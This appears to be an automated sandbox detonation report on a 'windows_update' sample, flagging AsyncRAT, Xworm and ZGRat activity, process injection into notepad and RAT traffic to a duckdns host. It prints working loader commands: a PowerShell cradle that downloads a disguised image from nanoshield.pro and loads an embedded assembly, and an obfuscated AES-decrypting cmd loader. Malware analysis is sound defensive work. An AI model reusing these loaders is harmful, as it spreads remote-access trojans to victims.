memory/2388-20-0x0000000002D80000-0x0000000002E00000-memory.dmp

memory/2388-22-0x0000000002D80000-0x0000000002E00000-memory.dmp

memory/2388-23-0x0000000002CA0000-0x0000000002CEE000-memory.dmp

memory/2388-24-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

memory/2728-25-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

145s

Max time network

154s

Command Line

C:\Windows\Explorer.EXE

Signatures

AsyncRat

rat asyncrat

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3212 created 3428 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\file.ps1

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 kdfsv.duckdns.org udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 kdfsv.duckdns.org udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 kdfsv.duckdns.org udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp

Files

memory/3212-0-0x0000020434C20000-0x0000020434C42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vg4w4iwe.dma.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3212-10-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp

memory/3212-12-0x00000204186A0000-0x00000204186B0000-memory.dmp

memory/3212-13-0x00000204186A0000-0x00000204186B0000-memory.dmp

memory/3212-11-0x00000204186A0000-0x00000204186B0000-memory.dmp

memory/3212-14-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp

memory/3212-15-0x0000020419EF0000-0x0000020419F4B000-memory.dmp

memory/3212-17-0x00000204186A0000-0x00000204186B0000-memory.dmp

memory/3212-18-0x00000204347D0000-0x000002043482B000-memory.dmp

memory/3212-16-0x00000204186A0000-0x00000204186B0000-memory.dmp

memory/4904-19-0x0000029EE1770000-0x0000029EE1786000-memory.dmp

memory/4904-20-0x0000029EE32B0000-0x0000029EE32C6000-memory.dmp

memory/4904-21-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp

memory/4904-23-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp

memory/4904-22-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp

memory/4904-24-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp

memory/3212-27-0x00000204347D0000-0x000002043482B000-memory.dmp

memory/3212-28-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp

memory/4904-29-0x00007FFB56ED0000-0x00007FFB570C5000-memory.dmp

memory/4904-30-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp

memory/4904-31-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp

memory/4904-32-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp

memory/4904-33-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp

memory/4904-34-0x00007FFB56ED0000-0x00007FFB570C5000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240319-en

Max time kernel

117s

Max time network

129s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\file.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\file.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.odencko/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 nanoshd.pro udp
US 8.8.8.8:53 nanoshield.pro udp
US 104.21.37.30:443 nanoshield.pro tcp

Files

memory/2668-4-0x000000001B220000-0x000000001B502000-memory.dmp

memory/2668-5-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

memory/2668-7-0x0000000002820000-0x0000000002828000-memory.dmp

memory/2668-6-0x0000000002740000-0x00000000027C0000-memory.dmp

memory/2668-8-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

memory/2668-9-0x0000000002740000-0x00000000027C0000-memory.dmp

memory/2668-10-0x0000000002740000-0x00000000027C0000-memory.dmp

memory/2668-11-0x0000000002740000-0x00000000027C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HY769T7AS1F5GZIR22I0.temp

MD5 3f25930d6bd489dfb884d6770376f149
SHA1 5eec9cbc758bd23d2e1501ebd5d5eccec3bc4842
SHA256 04076109e1d8a772d3053f65967be14d1a05e8e553ac2ed36f6ed920502c4f69
SHA512 5bd726831e16be240af9e11af24a89bdb26ac32805fbd690df4b91bf8951d4af16677913c6f867e7dfac4ecabe6d8b047a5d5245ff086bc11e5ebc8fde06512a

memory/2460-17-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

memory/2460-18-0x0000000002610000-0x0000000002690000-memory.dmp

memory/2460-19-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

memory/2460-20-0x0000000002610000-0x0000000002690000-memory.dmp

memory/2460-22-0x0000000002610000-0x0000000002690000-memory.dmp

memory/2460-21-0x0000000002610000-0x0000000002690000-memory.dmp

memory/2460-23-0x000000001AA90000-0x000000001AADE000-memory.dmp

memory/2460-24-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

memory/2668-25-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20231129-en

Max time kernel

118s

Max time network

119s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd"

Signatures

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1752 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1752 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1752 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1752 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1752 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1752 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 3020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 3020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 3020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd"

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd';$yqWK='LiJdgoadiJdg'.Replace('iJdg', ''),'ChBhSSaBhSSngBhSSeExBhSStBhSSenBhSSsBhSSioBhSSnBhSS'.Replace('BhSS', ''),'CopkoQeyTkoQeokoQe'.Replace('koQe', ''),'DerzLocrzLoomprzLoresrzLosrzLo'.Replace('rzLo', ''),'GQRxjetCQRxjurQRxjrenQRxjtPQRxjrQRxjocQRxjeQRxjssQRxj'.Replace('QRxj', ''),'FrBKzDomBBKzDaBKzDseBKzD6BKzD4SBKzDtrBKzDinBKzDgBKzD'.Replace('BKzD', ''),'SzuQcplzuQcitzuQc'.Replace('zuQc', ''),'ECcAUnCcAUtrCcAUyPCcAUoCcAUinCcAUtCcAU'.Replace('CcAU', ''),'RhWnpeahWnpdhWnpLihWnpnhWnpehWnpshWnp'.Replace('hWnp', ''),'ElTwQcemeTwQcntTwQcAtTwQc'.Replace('TwQc', ''),'CrerpgJatrpgJeDerpgJcrrpgJyrpgJptrpgJorrpgJ'.Replace('rpgJ', ''),'TraUhnCnsfUhnCoUhnCrmFUhnCinUhnCalUhnCBloUhnCckUhnC'.Replace('UhnC', ''),'MkqpgaikqpgnMkqpgokqpgdulkqpgekqpg'.Replace('kqpg', ''),'InNqdDvNqdDokeNqdD'.Replace('NqdD', '');powershell -w hidden;function iZOzL($TzqHY){$CRDEw=[System.Security.Cryptography.Aes]::Create();$CRDEw.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CRDEw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CRDEw.Key=[System.Convert]::($yqWK[5])('Y7IdTi6kX5lJbhqYY9FqtDytubVi34n2yBW8Q4423Ak=');$CRDEw.IV=[System.Convert]::($yqWK[5])('tLQNTWTubc+g+4ALClBhsw==');$AoFaY=$CRDEw.($yqWK[10])();$bufIb=$AoFaY.($yqWK[11])($TzqHY,0,$TzqHY.Length);$AoFaY.Dispose();$CRDEw.Dispose();$bufIb;}function xWxTo($TzqHY){$cdgLK=New-Object System.IO.MemoryStream(,$TzqHY);$cQORb=New-Object System.IO.MemoryStream;$eSUCm=New-Object System.IO.Compression.GZipStream($cdgLK,[IO.Compression.CompressionMode]::($yqWK[3]));$eSUCm.($yqWK[2])($cQORb);$eSUCm.Dispose();$cdgLK.Dispose();$cQORb.Dispose();$cQORb.ToArray();}$nXsEX=[System.IO.File]::($yqWK[8])([Console]::Title);$MCbHr=xWxTo (iZOzL ([Convert]::($yqWK[5])([System.Linq.Enumerable]::($yqWK[9])($nXsEX, 5).Substring(2))));$nFODc=xWxTo (iZOzL ([Convert]::($yqWK[5])([System.Linq.Enumerable]::($yqWK[9])($nXsEX, 
6).Substring(2))));[System.Reflection.Assembly]::($yqWK[0])([byte[]]$nFODc).($yqWK[7]).($yqWK[13])($null,$null);[System.Reflection.Assembly]::($yqWK[0])([byte[]]$MCbHr).($yqWK[7]).($yqWK[13])($null,$null); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Network

N/A

Files

memory/3044-2-0x0000000073AC0000-0x000000007406B000-memory.dmp

memory/3044-3-0x0000000073AC0000-0x000000007406B000-memory.dmp

memory/3044-4-0x00000000028A0000-0x00000000028E0000-memory.dmp

memory/3044-5-0x00000000028A0000-0x00000000028E0000-memory.dmp

memory/3044-6-0x0000000073AC0000-0x000000007406B000-memory.dmp

memory/3044-7-0x00000000028A0000-0x00000000028E0000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

57s

Max time network

173s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1252 created 3472 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE

Xworm

trojan rat xworm

ZGRat

rat zgrat

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
